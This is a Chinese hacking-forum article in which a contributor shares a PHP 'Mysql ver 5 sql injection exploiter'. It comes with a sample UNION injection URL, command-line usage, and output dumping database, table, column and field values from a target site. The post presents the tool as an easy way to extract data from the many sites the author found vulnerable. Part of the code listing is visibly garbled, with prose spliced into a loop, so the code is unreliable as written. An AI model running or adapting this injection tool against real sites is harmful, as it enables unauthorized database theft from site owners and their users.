首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 专题文章

php mysql 5 sql injection 暴取工具beta版


http://www.gipsky.com/
文章作者:mika

信息来源:邪恶八进制信息安全团队(www.eviloctal.com



mysql出来5版本以后,注入漏洞要比以前更轻易利用了,也可以像mssql那样直接暴取了(甚至比mssql更轻易了,因为mssql暴取是需要错误提示开启的,假如错误提示关闭的话,是需要暴力猜解的,而mysql的只要你找准注入点只要可以union出任何一个字段能在页面显示出来就可以了)。自从读了flyh4t的文章《Mysql5注射技巧总结》就一直想测试一下,结果我发现很多的站都更新到了这个版本,于是测试得不易乐呼~~~ 为了节省力气,自然是运用了自己所学的知识写个简单的工具自动暴取,比起手工来要省事多了。觉得会有许多朋友需要这样的工具,我虽然在网上找过包括最新的 pangolin,但是测试结果都不尽如人意。还是自己写的用起来顺手。其实代码没什么技术,但是本着共享的精神,算是提供个工具给大家吧,大家不要笑我哦

工具是php写的(因为俺觉得就这个写起来方便),代码如下:

http://www.vul.com/display_msg.php?id=432 and 1=2 union select 1,2,3,4,5,MIKA_MIKA,7,8";

$db_name="vuldb";

//****************************************************************************

$curl=curl_init();

curl_setopt($curl,CURLOPT_HEADER,0);

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);

curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");



function find_value($url){

global $curl;

//echo $url."\n";

curl_setopt($curl,CURLOPT_URL,$url);

$content=curl_exec($curl);

//echo $content;

$re=preg_match("/(\|\|. ?\|\|)/i",$content,$result);

//echo $content;

if($re)

{

//return str_replace('||','',$result[1]);

return $result[1];

}

return 0;

}



function str2ascii($str){

$temp="char(";

for($i=0;$ihttp://www.vul.com/display_msg.p ... 0union select 1,2,3,4,5,6,7,8

比如第6个数字会在页面上显示,那么你就将数字6替换成“MIKA_MIKA”,而且最后不要跟注释符(因为程序会在提交的时候自动加上),最终的url如下:

$url="http://www.vul.com/display_msg.php?id=432 and 1=2 union select 1,2,3,4,5,MIKA_MIKA,7,8";

另外$db_name是数据库名字,你可以直接用database()函数获取到,然后填到这里。



填完以后就可以用了,非常简单。打开cmd,切换到程序所在的目录,比如说暴取所有的数据库,可以这样用:

F:\scripts\php\mine>php mysql5.php -d

Mysql ver 5 sql injection exploiter



coded by Mika[EST]



DATABASES:

||information_schema||

||vuldb||

暴取表名:

F:\scripts\php\mine>php mysql5.php -t

Mysql ver 5 sql injection exploiter



coded by Mika[EST]



Tables of database VULDB :

||Articles||

||Audio||

.

.

.

省略

.

.

.

暴取字段名:

F:\scripts\php\mine>php mysql5.php -t Articles

Mysql ver 5 sql injection exploiter



coded by Mika[EST]



columns of table ARTICLES :

||ID||

||Article_ID||

||Title||

||Type||

.

.

.

省略

.

.

.

暴取值:

F:\scripts\php\mine>php mysql5.php -t Articles -f Type

Mysql ver 5 sql injection exploiter



coded by Mika[EST]



Type values of table ARTICLES :

||2||

||1||

.

.

.

省略

.

.

.

另外你想加入自己的条件的话,可以在最后在加上-c参数然后再跟上where条件来限定(不要带where),比如:

F:\scripts\php\mine>php mysql5.php -t Articles -f ID -c Type=2

Mysql ver 5 sql injection exploiter



coded by Mika[EST]



||58||

程序很简陋,但基本功能算是有了,俺也只是想到哪写到哪,所以以后有什么完善一定拿上来跟大家分享。代码里难免有错误和可以改进的地方,还请大家多帮忙一起修改。另外,代码里有这一行:

curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");

这是为了使用代理的,假如不需要可以直接注释掉。



声明:转载请保持完整,另外真的希望大家都不要太吝啬,有了修改有了添加,还希望能拿出来跟大家一起分享,虽然俺的代码不怎么样。
<< Real Player rmoc3260.dll Exp (老C给的,据说好用) 金山词霸的安全隐患 >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8